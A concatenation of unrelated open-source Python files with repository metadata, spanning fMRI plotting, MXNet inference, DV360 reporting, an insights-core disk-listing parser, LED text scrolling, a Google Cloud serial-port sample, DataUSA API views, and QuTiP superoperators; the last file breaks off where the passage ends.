domain (thanks to Lavi Secundo for providing a previous implementation of this
idea). This method can speed up calculation substantially for long time-series,
because the calculation is done using a vector multiplication in the frequency
domain representation of the time-series, instead of a more computationally
expensive convolution-like operation
"""
fig03 = viz.plot_tseries(E.xcorr_eta, ylabel='BOLD (% signal change)')
"""
.. image:: fig/event_related_fmri_03.png
We call plt.show() in order to display all the figures:
"""
plt.show()
"""
.. [Burock2000] M.A. Burock and A.M.Dale (2000). Estimation and Detection of
Event-Related fMRI Signals with Temporally Correlated Noise: A
Statistically Efficient and Unbiased Approach. Human Brain Mapping,
11:249-260
"""
|
31c4275e05845abf58061a2907de0749279a5b1b
|
75f81c32befeccc59b958cf849c777359df68d73
|
/container/sample-inf1/inf1_mx.py
|
eeaa72a12bf7e9c9d8b1d3537dc9a129425ee115
|
[
"Apache-2.0"
] |
permissive
|
neo-ai/neo-ai-dlr
|
4e20b40235e1be2d44f55b13cec3c15fc42dba2a
|
457aabf677ed368aa1077093fce4517381e04038
|
refs/heads/main
| 2023-06-07T17:21:14.600599
| 2022-08-26T22:03:40
| 2022-08-26T22:03:40
| 161,846,808
| 490
| 125
|
Apache-2.0
| 2023-05-18T05:38:28
| 2018-12-14T22:25:31
|
C++
|
UTF-8
|
Python
| false
| false
| 2,037
|
py
|
inf1_mx.py
|
import mxnet as mx
#import neomxnet
import os
import json
import numpy as np
from collections import namedtuple
dtype='float32'
Batch = namedtuple('Batch', ['data'])
ctx = mx.neuron()
is_gpu = False
def model_fn(model_dir):
print("param {}".format(os.environ.get('MODEL_NAME_CUSTOM')))
print("ctx {}".format(ctx))
sym, arg_params, aux_params = mx.model.load_checkpoint(os.path.join(model_dir, os.environ.get('MODEL_NAME_CUSTOM')), 0)
mod = mx.mod.Module(symbol=sym, context=ctx, label_names=None)
for arg in arg_params:
arg_params[arg] = arg_params[arg].astype(dtype)
for arg in aux_params:
aux_params[arg] = aux_params[arg].astype(dtype)
exe = mod.bind(for_training=False,
data_shapes=[('data', (1,3,224,224))],
label_shapes=mod._label_shapes)
mod.set_params(arg_params, aux_params, allow_missing=True)
return mod
def transform_fn(mod, img, input_content_type, output_content_type):
'''
stream = os.popen('/opt/aws/neuron/bin/neuron-cli list-model')
output = stream.read()
print(output)
stream = os.popen('/opt/aws/neuron/bin/neuron-cli list-ncg')
output = stream.read()
print(output)
'''
image = mx.image.imdecode(img)
resized = mx.image.resize_short(image, 224) # minimum 224x224 images
cropped, crop_info = mx.image.center_crop(resized, (224, 224))
normalized = mx.image.color_normalize(cropped.astype(np.float32) / 255,
mean=mx.nd.array([0.485, 0.456, 0.406]),
std=mx.nd.array([0.229, 0.224, 0.225]))
# the network expect batches of the form (N,3,224,224)
transposed = normalized.transpose((2, 0, 1)) # Transposing from (224, 224, 3) to (3, 224, 224)
batchified = transposed.expand_dims(axis=0) # change the shape from (3, 224, 224) to (1, 3, 224, 224)
image = batchified.astype(dtype='float32')
mod.forward(Batch([image]))
prob = mod.get_outputs()[0].asnumpy().tolist()
prob_json = json.dumps(prob)
return prob_json, output_content_type
|
8a4ca45ef2d4230b3ae00400c5d5e1cf1fcd0a9d
|
73305ddcc6dc9775b1e9a71506e2f3c74f678edc
|
/starthinker/tool/dv.py
|
3404aff39fa7275fb81cc939724589f55b39e27f
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
google/starthinker
|
ef359557da4140275a8524d0d813eecf022ece9e
|
b596df09c52511e2e0c0987f6245aa4607190dd0
|
refs/heads/master
| 2023-08-25T21:16:45.578012
| 2023-07-17T22:19:18
| 2023-07-17T22:20:10
| 123,017,995
| 167
| 64
|
Apache-2.0
| 2023-08-02T01:24:51
| 2018-02-26T19:15:09
|
Python
|
UTF-8
|
Python
| false
| false
| 3,271
|
py
|
dv.py
|
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import json
import argparse
import textwrap
from starthinker.util.google_api import API_DBM
from starthinker.util.dv import report_file, report_to_rows, report_clean
from starthinker.util.bigquery import get_schema
from starthinker.util.csv import rows_to_type, rows_print
from starthinker.util.configuration import commandline_parser, Configuration
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""\
Command line to help debug DV360 reports and build reporting tools.
Examples:
To get list of reports: python dv.py --list -u [user credentials path]
To get report json: python dv.py --report [id] -u [user credentials path]
To get report schema: python dv.py --schema [id] -u [user credentials path]
To get report sample: python dv.py --sample [id] -u [user credentials path]
"""))
# create parameters
parser.add_argument(
'--report', help='report ID to pull json definition', default=None)
parser.add_argument(
'--schema', help='report ID to pull schema format', default=None)
parser.add_argument(
'--sample', help='report ID to pull sample data', default=None)
parser.add_argument('--list', help='list reports', action='store_true')
# initialize project
parser = commandline_parser(parser, arguments=('-u', '-c', '-s', '-v'))
args = parser.parse_args()
config = Configuration(
user=args.user,
client=args.client,
service=args.service,
verbose=args.verbose
)
auth = 'service' if args.service else 'user'
# get report
if args.report:
report = API_DBM(config, auth).queries().get(
queryId=args.report).execute()
print(json.dumps(report, indent=2, sort_keys=True))
# get schema
elif args.schema:
filename, report = report_file(config, auth, args.schema, None, 10)
rows = report_to_rows(report)
rows = report_clean(rows)
rows = rows_to_type(rows)
print(json.dumps(get_schema(rows)[1], indent=2, sort_keys=True))
# get sample
elif args.sample:
filename, report = report_file(config, auth, args.sample, None, 10)
rows = report_to_rows(report)
rows = report_clean(rows)
rows = rows_to_type(rows)
for r in rows_print(rows, row_min=0, row_max=20):
pass
# get list
else:
for report in API_DBM(config, auth, iterate=True).queries().list().execute():
print(json.dumps(report, indent=2, sort_keys=True))
if __name__ == '__main__':
main()
|
0856a6cedb001ccbb27a5d97abb1d8950c01aa2a
|
b8d80a23cb27af08a1c4d34b478c76228ae5fbb4
|
/insights/parsers/ls_disk.py
|
af5dd78ed078d6d49d369f3ae783a0fcefe3152c
|
[
"Apache-2.0"
] |
permissive
|
RedHatInsights/insights-core
|
bb243e2bf8a52446fefb95ebe05478d6e35efe2e
|
b0ea07fc3f4dd8801b505fe70e9b36e628152c4a
|
refs/heads/master
| 2023-09-04T21:15:40.456257
| 2023-09-04T10:46:56
| 2023-09-04T10:46:56
| 92,518,221
| 144
| 290
|
Apache-2.0
| 2023-09-14T02:40:13
| 2017-05-26T14:23:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,326
|
py
|
ls_disk.py
|
"""
LsDisk - Command ``ls -lanR /dev/disk``
=======================================
The ``ls -lanR /dev/disk`` command provides information for the listing of the
directories under ``/dev/disk/`` .
Sample input is shown in the Examples. See ``FileListing`` class for
additional information.
Examples:
>>> LS_DISK = '''
... /dev/disk/by-id:
... total 0
... drwxr-xr-x. 2 0 0 360 Sep 20 09:36 .
... drwxr-xr-x. 5 0 0 100 Sep 20 09:36 ..
... lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 ata-VBOX_CD-ROM_VB2-01700376 -> ../../sr0
... lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 ata-VBOX_HARDDISK_VB4c56cb04-26932e6a -> ../../sdb
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 ata-VBOX_HARDDISK_VB4c56cb04-26932e6a-part1 -> ../../sdb1
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 scsi-SATA_VBOX_HARDDISK_VB4c56cb04-26932e6a-part1 -> ../../sdb1
...
... /dev/disk/by-path:
... total 0
... drwxr-xr-x. 2 0 0 160 Sep 20 09:36 .
... drwxr-xr-x. 5 0 0 100 Sep 20 09:36 ..
... lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 pci-0000:00:0d.0-scsi-1:0:0:0 -> ../../sdb
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 pci-0000:00:0d.0-scsi-1:0:0:0-part1 -> ../../sdb1
...
... /dev/disk/by-uuid:
... total 0
... drwxr-xr-x. 2 0 0 100 Sep 20 09:36 .
... drwxr-xr-x. 5 0 0 100 Sep 20 09:36 ..
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 3ab50b34-d0b9-4518-9f21-05307d895f81 -> ../../dm-1
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 51c5cf12-a577-441e-89da-bc93a73a1ba3 -> ../../sda1
... lrwxrwxrwx. 1 0 0 10 Sep 20 09:36 7b0068d4-1399-4ce7-a54a-3e2fc1232299 -> ../../dm-0
... '''
>>> from insights.tests import context_wrap
>>> ls_disk = LsDisk(context_wrap(LS_DISK))
<__main__.LsDisk object at 0x7f674914c690>
>>> "/dev/disk/by-path" in ls_disk
True
>>> ls_disk.files_of("/dev/disk/by-path")
['pci-0000:00:0d.0-scsi-1:0:0:0', 'pci-0000:00:0d.0-scsi-1:0:0:0-part1']
>>> ls_disk.dirs_of("/dev/disk/by-path")
['.', '..']
>>> ls_disk.specials_of("/dev/disk/by-path")
[]
>>> ls_disk.listing_of("/dev/disk/by-path").keys()
['pci-0000:00:0d.0-scsi-1:0:0:0-part1', 'pci-0000:00:0d.0-scsi-1:0:0:0', '..', '.']
>>> ls_disk.dir_entry("/dev/disk/by-path", "pci-0000:00:0d.0-scsi-1:0:0:0")
{'group': '0', 'name': 'pci-0000:00:0d.0-scsi-1:0:0:0', 'links': 1, 'perms': 'rwxrwxrwx.',
'raw_entry': 'lrwxrwxrwx. 1 0 0 9 Sep 20 09:36 pci-0000:00:0d.0-scsi-1:0:0:0 -> ../../sdb', 'owner': '0',
'link': '../../sdb', 'date': 'Sep 20 09:36', 'type': 'l', 'size': 9}
>>> ls_disk.listing_of('/dev/disk/by-path')['.']['type'] == 'd'
True
>>> ls_disk.listing_of('/dev/disk/by-path')['pci-0000:00:0d.0-scsi-1:0:0:0']['link']
'../../sdb'
"""
from .. import parser, FileListing, CommandParser
from insights.specs import Specs
from insights.util import deprecated
@parser(Specs.ls_disk)
class LsDisk(CommandParser, FileListing):
"""
.. warning::
This Parser is deprecated and will be removed from 3.5.0.
Please use the :class:`insights.parsers.ls.LSlanR` instead.
Parses output of ``ls -lanR /dev/disk`` command.
"""
def __init__(self, *args, **kwargs):
deprecated(LsDisk, "Please use the :class:`insights.parsers.ls.LSlanR` instead.", "3.5.0")
super(LsDisk, self).__init__(*args, **kwargs)
|
67dce38f70534e6700f1a55951b4d93e7701a4cb
|
30674cc03db1e93c0d5a6ff213b528d8ea70bb6a
|
/luma/core/legacy/__init__.py
|
3890e8b9718621a27eccd56d18bb7c18813d1dbd
|
[
"MIT"
] |
permissive
|
rm-hull/luma.core
|
6df4db6f6886a562dca9eec82e3cc42fe4dd5f98
|
d871d66644288b788641af0b3a20d3a97583dd70
|
refs/heads/master
| 2023-03-04T01:37:36.636573
| 2023-02-21T07:52:03
| 2023-02-21T07:52:03
| 78,548,891
| 134
| 61
|
MIT
| 2023-09-01T20:59:12
| 2017-01-10T15:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 3,138
|
py
|
__init__.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017-18 Richard Hull and contributors
# See LICENSE.rst for details.
"""
These methods were originally present in the old MAX7219 driver, and are
preserved here only to aid migration away from that library. The functions are
denoted 'legacy' to discourage use - you are encouraged to use the various
drawing capabilities in the Pillow library instead.
"""
from luma.core.render import canvas
from luma.core.virtual import viewport
from luma.core.sprite_system import framerate_regulator
from luma.core.legacy.font import DEFAULT_FONT
def textsize(txt, font=None):
"""
Calculates the bounding box of the text, as drawn in the specified font.
This method is most useful for when the
:py:class:`~luma.core.legacy.font.proportional` wrapper is used.
:param txt: The text string to calculate the bounds for
:type txt: str
:param font: The font (from :py:mod:`luma.core.legacy.font`) to use.
"""
font = font or DEFAULT_FONT
src = [c for ascii_code in txt for c in font[ord(ascii_code)]]
return (len(src), 8)
def text(draw, xy, txt, fill=None, font=None):
"""
Draw a legacy font starting at :py:attr:`x`, :py:attr:`y` using the
prescribed fill and font.
:param draw: A valid canvas to draw the text onto.
:type draw: PIL.ImageDraw
:param txt: The text string to display (must be ASCII only).
:type txt: str
:param xy: An ``(x, y)`` tuple denoting the top-left corner to draw the
text.
:type xy: tuple
:param fill: The fill color to use (standard Pillow color name or RGB
tuple).
:param font: The font (from :py:mod:`luma.core.legacy.font`) to use.
"""
font = font or DEFAULT_FONT
x, y = xy
for ch in txt:
for byte in font[ord(ch)]:
for j in range(8):
if byte & 0x01 > 0:
draw.point((x, y + j), fill=fill)
byte >>= 1
x += 1
def show_message(device, msg, y_offset=0, fill=None, font=None,
scroll_delay=0.03):
"""
Scrolls a message right-to-left across the devices display.
:param device: The device to scroll across.
:param msg: The text message to display (must be ASCII only).
:type msg: str
:param y_offset: The row to use to display the text.
:type y_offset: int
:param fill: The fill color to use (standard Pillow color name or RGB
tuple).
:param font: The font (from :py:mod:`luma.core.legacy.font`) to use.
:param scroll_delay: The number of seconds to delay between scrolling.
:type scroll_delay: float
"""
fps = 0 if scroll_delay == 0 else 1.0 / scroll_delay
regulator = framerate_regulator(fps)
font = font or DEFAULT_FONT
with canvas(device) as draw:
w, h = textsize(msg, font)
x = device.width
virtual = viewport(device, width=w + x + x, height=device.height)
with canvas(virtual) as draw:
text(draw, (x, y_offset), msg, font=font, fill=fill)
i = 0
while i <= w + x:
with regulator:
virtual.set_position((i, 0))
i += 1
|
6e5287763ef247ff6529012446e95c86b8aea3a2
|
35b6013c1943f37d1428afd2663c8aba0a02628d
|
/compute/client_library/ingredients/instances/get_serial_port.py
|
76503c320525b53f67f125c3f1a6bb65f42254ca
|
[
"Apache-2.0"
] |
permissive
|
GoogleCloudPlatform/python-docs-samples
|
d2a251805fbeab15d76ed995cf200727f63f887d
|
44e819e713c3885e38c99c16dc73b7d7478acfe8
|
refs/heads/main
| 2023-08-28T12:52:01.712293
| 2023-08-28T11:18:28
| 2023-08-28T11:18:28
| 35,065,876
| 7,035
| 7,593
|
Apache-2.0
| 2023-09-14T20:20:56
| 2015-05-04T23:26:13
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,831
|
py
|
get_serial_port.py
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This is an ingredient file. It is not meant to be run directly. Check the samples/snippets
# folder for complete code samples that are ready to be used.
# Disabling flake8 for the ingredients file, as it would fail F821 - undefined name check.
# flake8: noqa
from google.cloud import compute_v1
# <INGREDIENT get_instance_serial_port_output>
def get_instance_serial_port_output(
project_id: str, zone: str, instance_name: str
) -> compute_v1.SerialPortOutput:
"""
Returns the last 1 MB of serial port output from the specified instance.
Args:
project_id: project ID or project number of the Cloud project you want to use.
zone: name of the zone you want to use. For example: “us-west3-b”
instance_name: name of the VM instance you want to query.
Returns:
Content of the serial port output of an instance inside a compute_v1.SerialPortOutput object.
More about this type: https://cloud.google.com/python/docs/reference/compute/latest/google.cloud.compute_v1.types.SerialPortOutput
"""
instance_client = compute_v1.InstancesClient()
return instance_client.get_serial_port_output(
project=project_id, zone=zone, instance=instance_name
)
# </INGREDIENT>
|
e98ba344af68ebaaf1419efa360ef6ba70ec880b
|
463d49f20a5c0c0851c53d5e16514c265f8910aa
|
/datausa/core/views.py
|
f317423382948e6d15cfa8d5674ae76359a0a052
|
[] |
no_license
|
DataUSA/datausa-api
|
f6c503680f66b470c77a4ab9f0e7a4643659252f
|
7288dede082eda07b61e11cf6dc801fe692f6334
|
refs/heads/master
| 2022-02-14T00:03:13.241210
| 2022-01-31T17:16:27
| 2022-01-31T17:16:27
| 37,325,775
| 251
| 50
| null | 2022-01-13T13:00:27
| 2015-06-12T14:13:50
|
Python
|
UTF-8
|
Python
| false
| false
| 4,282
|
py
|
views.py
|
from flask import Blueprint, request, jsonify
from datausa.attrs.models import Cip, Naics, University
from datausa.core import table_manager
from datausa.core import api, join_api
from datausa.core.models import ApiObject
from datausa.core.crosswalker import crosswalk
from datausa.util.big_places import is_big_geo
from datausa.core.exceptions import DataUSAException
mod = Blueprint('core', __name__, url_prefix='/api')
manager = table_manager.TableManager()
def show_attrs(attr_obj):
attrs = attr_obj.query.all()
data = [a.serialize() for a in attrs]
return jsonify(data=data)
def build_api_obj(default_limit=None):
show = request.args.get("show", "")
sumlevel = request.args.get("sumlevel", "").lower()
required = request.args.get("required", "")
force = request.args.get("force", "")
where = request.args.get("where", "")
order = request.args.get("order", "")
sort = request.args.get("sort", "")
limit = request.args.get("limit", default_limit)
offset = request.args.get("offset", None)
exclude = request.args.get("exclude", None)
auto_crosswalk = request.args.get("auto_crosswalk", False)
display_names = request.args.get("display_names", False)
shows = show.split(",")
sumlevels = sumlevel.split(",")
if shows and not sumlevel:
sumlevels = ["all" for show in shows]
values = required.split(",") if required else []
shows_and_levels = {val:sumlevels[idx] for idx, val in enumerate(shows)}
variables = manager.possible_variables
vars_and_vals = {var:request.args.get(var, None) for var in variables}
vars_and_vals = {k:v for k,v in vars_and_vals.items() if v}
    vars_needed = list(vars_and_vals.keys()) + shows + values  # list() for Python 3 compatibility
api_obj = ApiObject(vars_needed=vars_needed, vars_and_vals=vars_and_vals,
shows_and_levels=shows_and_levels, values=values,
where=where, force=force, order=order,
sort=sort, limit=limit, exclude=exclude,
auto_crosswalk=auto_crosswalk,
display_names=display_names,
offset=offset)
return api_obj
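# Illustrative request (parameter names as parsed above; values hypothetical):
#
#     /api/?show=geo&sumlevel=state&required=pop&limit=10
#
# which yields an ApiObject with shows_and_levels={'geo': 'state'} and
# values=['pop'].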
@mod.route("/")
@mod.route("/v1/")
@mod.route("/csv/", defaults={'csv': True})
def api_view(csv=None):
api_obj = build_api_obj()
api_obj = manager.force_1yr_for_big_places(api_obj)
api_obj = manager.schema_selector(api_obj)
table_list = manager.all_tables(api_obj)
table = manager.select_best(table_list, api_obj)
api_obj.capture_logic(table_list)
api_obj = manager.crosswalk(table, api_obj)
data = api.query(table, api_obj, stream=csv)
return data
@mod.route("/join/")
@mod.route("/join/csv/", defaults={'csv': True})
def api_join_view(csv=None):
api_obj = build_api_obj(default_limit=500)
if api_obj.limit and api_obj.limit > 80000:
raise DataUSAException("Limit parameter must be less than 80,000")
tables = manager.required_tables(api_obj)
data = join_api.joinable_query(tables, api_obj, manager.table_years, csv_format=csv)
return data
@mod.route("/logic/")
def logic_view():
api_obj = build_api_obj()
table_list = manager.all_tables(api_obj)
return jsonify(tables=[table.info(api_obj) for table in table_list])
@mod.route("/variables/")
def view_variables():
'''show available data tables and contained variables'''
shows = request.args.get("show", "").split(",")
sumlevels = request.args.get("sumlevel", "").split(",")
list_all = sumlevels == [""] and shows == [""]
if sumlevels == [""]:
sumlevels = ["all"] * len(shows)
    combos = list(zip(shows, sumlevels))  # materialized: reused for every table in the comprehension below
results = {table.full_name(): table.col_strs(short_name=True) for table in table_manager.registered_models
if list_all or all([table.can_show(show, sumlevel) for show,sumlevel in combos])}
return jsonify(metadata=results)
@mod.route('/table/variables/')
def all_table_vars():
'''show all available data tables and contained variables'''
results = {table.full_name(): table.col_strs(short_name=True) for table in table_manager.registered_models}
return jsonify(metadata=results)
@mod.route("/years/")
def years_view():
years_data = manager.table_years_set
return jsonify(data=years_data)
|
f5a3afe0917cd5913b329aed0306274253f961d4
|
49173bc5a31caa2adf5f304f2f55cc3f5fda452a
|
/qutip/core/superoperator.py
|
3ed59fc6231d273c40a41efe1f979ee9de728e9d
|
[
"BSD-3-Clause"
] |
permissive
|
qutip/qutip
|
a35e73670501c33898e24fe72bf255f8fb4a6632
|
2dc5f3f0a6ad2175e6dc015649989125401fc3bf
|
refs/heads/master
| 2023-09-01T01:09:53.422153
| 2023-08-25T14:18:15
| 2023-08-25T14:18:15
| 6,136,261
| 1,489
| 679
|
BSD-3-Clause
| 2023-09-07T14:16:03
| 2012-10-09T06:20:46
|
Python
|
UTF-8
|
Python
| false
| false
| 14,197
|
py
|
superoperator.py
|
__all__ = [
'liouvillian', 'lindblad_dissipator', 'operator_to_vector',
'vector_to_operator', 'stack_columns', 'unstack_columns', 'stacked_index',
'unstacked_index', 'spost', 'spre', 'sprepost', 'reshuffle',
]
import functools
import numpy as np
from .qobj import Qobj
from . import data as _data
def _map_over_compound_operators(f):
"""
Convert a function which takes Qobj into one that can also take compound
operators like QobjEvo, and applies itself over all the components.
"""
@functools.wraps(f)
def out(qobj):
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if isinstance(qobj, QobjEvo):
return qobj.linear_map(f, _skip_check=True)
if not isinstance(qobj, Qobj):
raise TypeError("expected a quantum object")
return f(qobj)
return out
def liouvillian(H=None, c_ops=None, data_only=False, chi=None):
"""Assembles the Liouvillian superoperator from a Hamiltonian
and a ``list`` of collapse operators.
Parameters
----------
H : Qobj or QobjEvo (optional)
System Hamiltonian or Hamiltonian component of a Liouvillian.
Considered `0` if not given.
c_ops : array_like of Qobj or QobjEvo
A ``list`` or ``array`` of collapse operators.
data_only : bool [False]
Return the data object instead of a Qobj
chi : array_like of float [None]
In some systems it is possible to determine the statistical moments (mean, variance, etc) of the
probability distributions of occupation of various states by numerically evaluating the derivatives
of the steady state occupation probability as a function of artificial phase parameters ``chi``
which are included in the :func:`lindblad_dissipator` for each collapse operator. See
the documentation of :func:`lindblad_dissipator` for references and further details.
This parameter is deprecated and may be removed in QuTiP 5.
Returns
-------
L : Qobj or QobjEvo
Liouvillian superoperator.
"""
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if (
data_only
and (isinstance(H, QobjEvo)
or any(isinstance(op, QobjEvo) for op in c_ops))
):
raise ValueError("Cannot return the data object when computing the"
" liouvillian with QobjEvo")
c_ops = c_ops or []
if isinstance(c_ops, (Qobj, QobjEvo)):
c_ops = [c_ops]
if chi and len(chi) != len(c_ops):
raise ValueError('chi must be a list with same length as c_ops')
chi = chi or [0] * len(c_ops)
if H is None:
# No Hamiltonian, add the lindblad_dissipator of c_ops:
if not c_ops:
raise ValueError("The liouvillian need an Hamiltonian"
" and/or c_ops")
out = sum(lindblad_dissipator(c_op, chi=chi_)
for c_op, chi_ in zip(c_ops, chi))
return out.data if data_only else out
elif not H.isoper:
raise TypeError("Invalid type for Hamiltonian.")
if isinstance(H, QobjEvo) or any(isinstance(op, QobjEvo) for op in c_ops):
# With QobjEvo, faster computation using Data is not used
L = -1.0j * (spre(H) - spost(H))
L += sum(lindblad_dissipator(c_op, chi=chi_)
for c_op, chi_ in zip(c_ops, chi))
return L
op_dims = H.dims
op_shape = H.shape
sop_dims = [[op_dims[0], op_dims[0]], [op_dims[1], op_dims[1]]]
sop_shape = [np.prod(op_dims), np.prod(op_dims)]
spI = _data.identity(op_shape[0], dtype=type(H.data))
data = _data.mul(_data.kron(spI, H.data), -1j)
data = _data.add(data, _data.kron_transpose(H.data, spI), scale=1j)
for c_op, chi_ in zip(c_ops, chi):
c = c_op.data
cd = c.adjoint()
cdc = _data.matmul(cd, c)
data = _data.add(data, _data.kron(c.conj(), c), np.exp(1j*chi_))
data = _data.add(data, _data.kron(spI, cdc), -0.5)
data = _data.add(data, _data.kron_transpose(cdc, spI), -0.5)
if data_only:
return data
else:
return Qobj(data,
dims=sop_dims,
type='super',
superrep='super',
copy=False)
def lindblad_dissipator(a, b=None, data_only=False, chi=None):
"""
Lindblad dissipator (generalized) for a single pair of collapse operators
(a, b), or for a single collapse operator (a) when b is not specified:
.. math::
\\mathcal{D}[a,b]\\rho = a \\rho b^\\dagger -
\\frac{1}{2}a^\\dagger b\\rho - \\frac{1}{2}\\rho a^\\dagger b
Parameters
----------
a : Qobj or QobjEvo
Left part of collapse operator.
b : Qobj or QobjEvo (optional)
Right part of collapse operator. If not specified, b defaults to a.
chi : float [None]
In some systems it is possible to determine the statistical moments (mean, variance, etc) of the
probability distribution of the occupation numbers of states by numerically evaluating the derivatives
of the steady state occupation probability as a function of an artificial phase parameter ``chi``
which multiplies the ``a \\rho a^dagger`` term of the dissipator by ``e ^ (i * chi)``. The factor ``e ^ (i * chi)``
is introduced via the generating function of the statistical moments. For examples of the technique,
see `Full counting statistics of nano-electromechanical systems <https://arxiv.org/abs/cond-mat/0410322>`_
and `Photon-mediated electron transport in hybrid circuit-QED <https://arxiv.org/abs/1303.7449>`_.
This parameter is deprecated and may be removed in QuTiP 5.
data_only : bool [False]
Return the data object instead of a Qobj
Returns
-------
D : qobj, QobjEvo
Lindblad dissipator superoperator.
"""
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if data_only and (isinstance(a, QobjEvo) or isinstance(b, QobjEvo)):
raise ValueError("Cannot return the data object when computing the"
" collapse of a QobjEvo")
if b is None:
b = a
ad_b = a.dag() * b
if chi:
D = (
spre(a) * spost(b.dag()) * np.exp(1j * chi)
- 0.5 * spre(ad_b)
- 0.5 * spost(ad_b)
)
else:
D = spre(a) * spost(b.dag()) - 0.5 * spre(ad_b) - 0.5 * spost(ad_b)
return D.data if data_only else D
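# Usage sketch (illustrative; uses qutip's standard lowering operator):
#
#     from qutip import destroy
#     a = destroy(2)                # two-level lowering operator
#     D = lindblad_dissipator(a)    # Qobj superoperator with type='super'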
@_map_over_compound_operators
def operator_to_vector(op):
"""
Create a vector representation given a quantum operator in matrix form.
The passed object should have a ``Qobj.type`` of 'oper' or 'super'; this
function is not designed for general-purpose matrix reshaping.
Parameters
----------
op : Qobj or QobjEvo
Quantum operator in matrix form. This must have a type of 'oper' or
'super'.
Returns
-------
Qobj or QobjEvo
The same object, but re-cast into a column-stacked-vector form of type
'operator-ket'. The output is the same type as the passed object.
"""
if op.type in ['super', 'operator-ket', 'operator-bra']:
raise TypeError("Cannot convert object already "
"in super representation")
return Qobj(stack_columns(op.data),
dims=[op.dims, [1]],
type='operator-ket',
superrep="super",
copy=False)
@_map_over_compound_operators
def vector_to_operator(op):
"""
Create a matrix representation given a quantum operator in vector form.
The passed object should have a ``Qobj.type`` of 'operator-ket'; this
function is not designed for general-purpose matrix reshaping.
Parameters
----------
op : Qobj or QobjEvo
Quantum operator in column-stacked-vector form. This must have a type
of 'operator-ket'.
Returns
-------
Qobj or QobjEvo
The same object, but re-cast into "standard" operator form. The output
is the same type as the passed object.
"""
if not op.isoperket:
raise TypeError("only defined for operator-kets")
if op.superrep != "super":
raise TypeError("only defined for operator-kets in super format")
dims = op.dims[0]
return Qobj(unstack_columns(op.data, (np.prod(dims[0]), np.prod(dims[1]))),
dims=dims,
copy=False)
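# Round-trip sketch (illustrative, using a standard qutip operator):
#
#     from qutip import sigmax
#     v = operator_to_vector(sigmax())   # 'operator-ket', shape (4, 1)
#     op = vector_to_operator(v)         # back to the original 2x2 operator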
def stack_columns(matrix):
"""
Stack the columns in a data-layer type, useful for converting an operator
into a superoperator representation.
"""
if not isinstance(matrix, (_data.Data, np.ndarray)):
raise TypeError(
"input " + repr(type(matrix)) + " is not data-layer type"
)
if isinstance(matrix, np.ndarray):
return matrix.ravel('F')[:, None]
return _data.column_stack(matrix)
def unstack_columns(vector, shape=None):
"""
Unstack the columns in a data-layer type back into a 2D shape, useful for
converting an operator in vector form back into a regular operator. If
`shape` is not passed, the output operator will be assumed to be square.
"""
if not isinstance(vector, (_data.Data, np.ndarray)):
raise TypeError(
"input " + repr(type(vector)) + " is not data-layer type"
)
if (
(isinstance(vector, _data.Data) and vector.shape[1] != 1)
or (isinstance(vector, np.ndarray)
and ((vector.ndim == 2 and vector.shape[1] != 1)
or vector.ndim > 2))
):
raise TypeError("input is not a single column")
if shape is None:
n = int(np.sqrt(vector.shape[0]))
if n * n != vector.shape[0]:
raise ValueError(
"input cannot be made square, but no specific shape given"
)
shape = (n, n)
if isinstance(vector, np.ndarray):
return vector.reshape(shape, order='F')
return _data.column_unstack(vector, shape[0])
def unstacked_index(size, index):
"""
Convert an index into a column-stacked square operator with `size` rows and
columns, into a pair of indices into the unstacked operator.
"""
return index % size, index // size
def stacked_index(size, row, col):
"""
Convert a pair of indices into a square operator of `size` into a single
index into the column-stacked version of the operator.
"""
return row + size*col
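# Worked example for a 4x4 operator: column-stacked index 9 corresponds to
# (row, col) = (1, 2), and stacking that pair back recovers 9:
#
#     unstacked_index(4, 9)    # -> (1, 2)
#     stacked_index(4, 1, 2)   # -> 9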
@_map_over_compound_operators
def spost(A):
"""
Superoperator formed from post-multiplication by operator A
Parameters
----------
A : Qobj or QobjEvo
Quantum operator for post multiplication.
Returns
-------
super : Qobj or QobjEvo
        Superoperator formed from input quantum object.
"""
if not A.isoper:
raise TypeError('Input is not a quantum operator')
Id = _data.identity(A.shape[0], dtype=type(A.data))
data = _data.kron_transpose(A.data, _data.identity_like(A.data))
return Qobj(data,
dims=[A.dims, A.dims],
type='super',
superrep='super',
isherm=A._isherm,
copy=False)
@_map_over_compound_operators
def spre(A):
"""Superoperator formed from pre-multiplication by operator A.
Parameters
----------
A : Qobj or QobjEvo
Quantum operator for pre-multiplication.
Returns
-------
super :Qobj or QobjEvo
Superoperator formed from input quantum object.
"""
if not A.isoper:
raise TypeError('Input is not a quantum operator')
data = _data.kron(_data.identity_like(A.data), A.data)
return Qobj(data,
dims=[A.dims, A.dims],
type='super',
superrep='super',
isherm=A._isherm,
copy=False)
def _drop_projected_dims(dims):
"""
